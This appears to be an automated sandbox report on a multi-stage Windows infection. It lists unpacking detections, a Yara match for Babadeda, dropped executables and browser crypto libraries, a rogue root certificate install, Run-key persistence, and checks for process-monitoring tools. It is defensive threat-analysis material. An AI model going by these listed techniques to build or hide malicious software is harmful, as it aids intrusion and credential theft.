Source:	Binary string: ntdll.pdb source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb612522248Software\Bitcoin\Bitcoin-Qtp source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Unpacked PE file: 5.2.RoamingBKKFHIEGDH.exe.a50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Unpacked PE file: 8.2.RoamingAEGIJKEHCA.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 9.2.axplong.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 10.2.axplong.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 15.2.explorti.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 16.2.explorti.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ead6a72944.exe	Unpacked PE file: 28.2.ead6a72944.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack

Yara detected Babadeda

Source: Yara match	File source: 28.2.ead6a72944.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.ead6a72944.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\1000003002\ead6a72944.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe, type: DROPPED

Source: buildred[1].exe.20.dr

Static PE information: 0xF4A21C47 [Fri Jan 22 01:32:55 2100 UTC]

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004195E0

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: PharmaciesDetection[1].exe.20.dr	Static PE information: real checksum: 0x0 should be: 0xdf9f4
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: explorti.exe.8.dr	Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: buildred[1].exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x56436
Source: random[1].exe0.19.dr	Static PE information: real checksum: 0x0 should be: 0x22727
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: build2[1].exe.20.dr	Static PE information: real checksum: 0x2a71a3 should be: 0x2ab10a
Source: buildred.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x56436
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: build2.exe.20.dr	Static PE information: real checksum: 0x2a71a3 should be: 0x2ab10a
Source: axplong.exe.5.dr	Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: PharmaciesDetection.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0xdf9f4
Source: enter[1].exe.0.dr	Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: ead6a72944.exe.19.dr	Static PE information: real checksum: 0x0 should be: 0x22727

Source: file.exe	Static PE information: section name: .yoboy
Source: file.exe	Static PE information: section name: .tezanaz
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: etmksbbt
Source: random[1].exe.0.dr	Static PE information: section name: iosnleeh
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: .idata
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: etmksbbt
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: iosnleeh
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: .taggant
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: .idata
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: owfltkii
Source: enter[1].exe.0.dr	Static PE information: section name: lwtisuou
Source: enter[1].exe.0.dr	Static PE information: section name: .taggant
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: .idata
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: owfltkii
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: lwtisuou
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: .taggant
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: .idata
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: etmksbbt
Source: axplong.exe.5.dr	Static PE information: section name: iosnleeh
Source: axplong.exe.5.dr	Static PE information: section name: .taggant
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: .idata
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: owfltkii
Source: explorti.exe.8.dr	Static PE information: section name: lwtisuou
Source: explorti.exe.8.dr	Static PE information: section name: .taggant
Source: random[1].exe.19.dr	Static PE information: section name: .yoboy
Source: random[1].exe.19.dr	Static PE information: section name: .tezanaz
Source: ba77748b9b.exe.19.dr	Static PE information: section name: .yoboy
Source: ba77748b9b.exe.19.dr	Static PE information: section name: .tezanaz
Source: random[1].exe0.19.dr	Static PE information: section name: .code
Source: ead6a72944.exe.19.dr	Static PE information: section name: .code
Source: build2[1].exe.20.dr	Static PE information: section name: .xdata
Source: build2.exe.20.dr	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A9F5 push ecx; ret		0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70B536 push ecx; ret		0_2_6C70B549

Source: file.exe	Static PE information: section name: .text entropy: 7.821310507065361
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.979174049479235
Source: random[1].exe.0.dr	Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: entropy: 7.979174049479235
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: enter[1].exe.0.dr	Static PE information: section name: entropy: 7.983907263958997
Source: enter[1].exe.0.dr	Static PE information: section name: owfltkii entropy: 7.952293456339948
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: entropy: 7.983907263958997
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: owfltkii entropy: 7.952293456339948
Source: axplong.exe.5.dr	Static PE information: section name: entropy: 7.979174049479235
Source: axplong.exe.5.dr	Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: explorti.exe.8.dr	Static PE information: section name: entropy: 7.983907263958997
Source: explorti.exe.8.dr	Static PE information: section name: owfltkii entropy: 7.952293456339948
Source: random[1].exe.19.dr	Static PE information: section name: .text entropy: 7.821310507065361
Source: ba77748b9b.exe.19.dr	Static PE information: section name: .text entropy: 7.821310507065361

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Jump to dropped file

Installs new ROOT certificates

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\enter[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\PharmaciesDetection[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\1000003002\ead6a72944.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Jump to dropped file
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
